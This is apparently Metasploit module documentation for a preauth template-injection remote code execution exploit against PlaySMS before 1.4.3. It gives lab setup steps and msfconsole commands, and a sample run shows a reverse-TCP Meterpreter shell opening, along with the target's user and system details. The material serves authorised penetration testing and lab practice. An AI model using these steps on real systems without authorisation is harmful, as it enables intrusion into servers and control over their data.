## Vulnerable Application ### Description This module exploits a preauth Server-Side Template Injection vulnerability that leads to remote code execution in PlaySMS before version 1.4.3. This issue is caused by double processing a server-side template with a custom PHP template system called 'TPL' which is used in the PlaySMS template engine at `src/Playsms/Tpl.php:_compile()`. The vulnerability is triggered when an attacker supplied username with a malicious payload is submitted. This malicious payload is then stored in a TPL template which when rendered a second time, results in code execution. The TPL (https://github.com/antonraharja/tpl) template language is vulnerable to PHP code injection. ### Setup Available at [Source Forge](https://sourceforge.net/projects/playsms/files/playsms/Version%201.4.2/playsms-1.4.2.tar.gz/download). 1. Download the application 2. Extract : `tar -xvf playsms-1.4.2.tar.gz` 3. Move in to the web directory : `mv playsms-1.4.2/web/* /var/www/html/` 4. Make the config file: `cp /var/www/html/config-dist.php /var/www/html/config.php` 5. Change the owner : `chown -R www-data:www-data /var/www/html/` 6. Set DB creds in the config.php file and dump playsms-1.4.2/db/playsms.sql in to your playsms database 7. Now visit : http://localhost/ ## Verification Steps 1. Install the application (Tested on HactheBox Frolic Machine) 2. Start msfconsole 3. Do: `use exploit/multi/http/playsms_template_injection` 4. Do: `set rport ` 5. Do: `set rhost ` 6. Do: `set targeturi /playsms` 7. Do: `check` ``` [*] 10.10.10.111:9999 - The target appears to be vulnerable. ``` 10. Do: `set lport ` 11. Do: `set lhost ` 12. Do: `run` 13. You should get a shell. ## Scenarios ### Playsms on Ubuntu Linux ``` msf5 exploit(multi/http/playsms_template_injection) > options Module options (exploit/multi/http/playsms_template_injection): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:' RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes Base playsms directory path VHOST no HTTP server virtual host Payload options (php/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 PlaySMS Before 1.4.3 msf5 exploit(multi/http/playsms_template_injection) > set rhosts 127.0.0.1 rhosts => 127.0.0.1 msf5 exploit(multi/http/playsms_template_injection) > set lhost 192.168.1.3 lhost => 192.168.1.3 msf5 exploit(multi/http/playsms_template_injection) > run [*] Started reverse TCP handler on 192.168.1.3:4444 [+] X-CSRF-Token for login : c62b21bdb395dca92c18446217e31d7f [*] Trying to Send Payload in Username Field ...... [+] Payload successfully sent [*] Cookies here : PHPSESSID=p0jmmf1kpqfhpbpcgpbcfbhpv3; [*] Sending stage (38288 bytes) to 192.168.1.3 [*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.3:51800) at 2020-04-02 17:30:53 -0500 meterpreter > getuid Server username: www-data (1000) meterpreter > sysinfo Computer : ec31d13f3520 OS : Linux ec31d13f3520 4.19.76-linuxkit #1 SMP Thu Oct 17 19:31:58 UTC 2019 x86_64 Meterpreter : php/linux meterpreter > ```